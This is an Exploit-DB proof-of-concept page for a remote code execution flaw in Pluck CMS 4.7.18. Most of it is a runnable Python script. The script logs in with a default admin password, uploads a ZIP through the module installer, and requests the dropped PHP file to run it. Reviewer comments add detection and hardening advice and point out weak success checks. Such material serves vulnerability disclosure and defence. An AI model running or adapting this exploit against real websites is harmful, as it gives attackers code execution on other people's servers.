Pluck v4.7.18 – Remote Code Execution (RCE)

  • 作者: Mirabbas Ağalarov
    日期: 2023-07-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51592/
  • #Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
    #Application: pluck
    #Version: 4.7.18
    #Bugs:RCE
    #Technology: PHP
    #Vendor URL: https://github.com/pluck-cms/pluck
    #Software Link: https://github.com/pluck-cms/pluck
    #Date found: 10-07-2023
    #Author: Mirabbas Ağalarov
    #Tested on: Linux 
    
    
    import requests
    from requests_toolbelt.multipart.encoder import MultipartEncoder
    
    # Reviewer summary (defensive reading of this proof of concept):
    #   1. An admin session is opened against a local lab install of Pluck.
    #   2. A ZIP archive is posted to the module installer endpoint.
    #   3. A PHP file is then fetched from data/modules/<module>/.
    # Step 3 implies the installer unpacks archive contents into a web-served
    # directory where PHP is executed. The archive contents are not shown on
    # this page, so that is inferred from the request sequence only.
    #
    # What a defender can take from it:
    #   - Module installation is an admin-only feature, so the exposure depends
    #     on how well the admin login is protected (strong password, restricted
    #     network access to login.php / admin.php).
    #   - Blocking script execution under data/ at the web-server level removes
    #     the impact of a file landing there.
    #   - In access logs, a POST to admin.php?action=installmodule followed by a
    #     GET for a .php file under data/modules/ is the pattern to alert on, as
    #     are new .php files appearing under data/modules/ on disk.

    # Lab target endpoints (localhost only, as published).
    login_url = "http://localhost/pluck/login.php"
    upload_url = "http://localhost/pluck/admin.php?action=installmodule"
    rce_url = "http://localhost/pluck/data/modules/mirabbas/miri.php"

    # Login form fields. "cont1" appears to be the password field; the value
    # here is a default-style password for the author's test instance.
    login_headers = {"Referer": login_url}
    login_form = {"cont1": "admin", "bogus": "", "submit": "Log in"}

    # The operator supplies the archive path interactively.
    archive_path = input("ZIP file path: ")

    # NOTE(review): the handle opened here is never closed explicitly; it is
    # released only when the interpreter exits.
    archive_form = MultipartEncoder(
        fields={
            "sendfile": ("mirabbas.zip", open(archive_path, "rb"), "application/zip"),
            "submit": "Upload",
        }
    )

    # One Session keeps the cookie from the login for the upload request.
    admin_session = requests.Session()
    login_reply = admin_session.post(login_url, headers=login_headers, data=login_form)

    # NOTE(review): both checks below look only at the HTTP status code, so the
    # printed messages are not confirmation that login or installation worked.
    # Do not treat this output as proof that a host is (or is not) affected.
    if login_reply.status_code != 200:
        print("Login problem. response code:", login_reply.status_code)
    else:
        print("Login account")

        install_headers = {
            "Referer": upload_url,
            "Content-Type": archive_form.content_type,
        }
        install_reply = admin_session.post(
            upload_url, headers=install_headers, data=archive_form
        )

        if install_reply.status_code != 200:
            print("ZIP file download error. Response code:", install_reply.status_code)
        else:
            print("ZIP file download.")

    # This last request is sent without the session (no admin cookie) and runs
    # even when the steps above reported an error. If it returns script output,
    # the installed file is reachable and executed for unauthenticated visitors.
    rce_reply = requests.get(rce_url)
    print(rce_reply.text)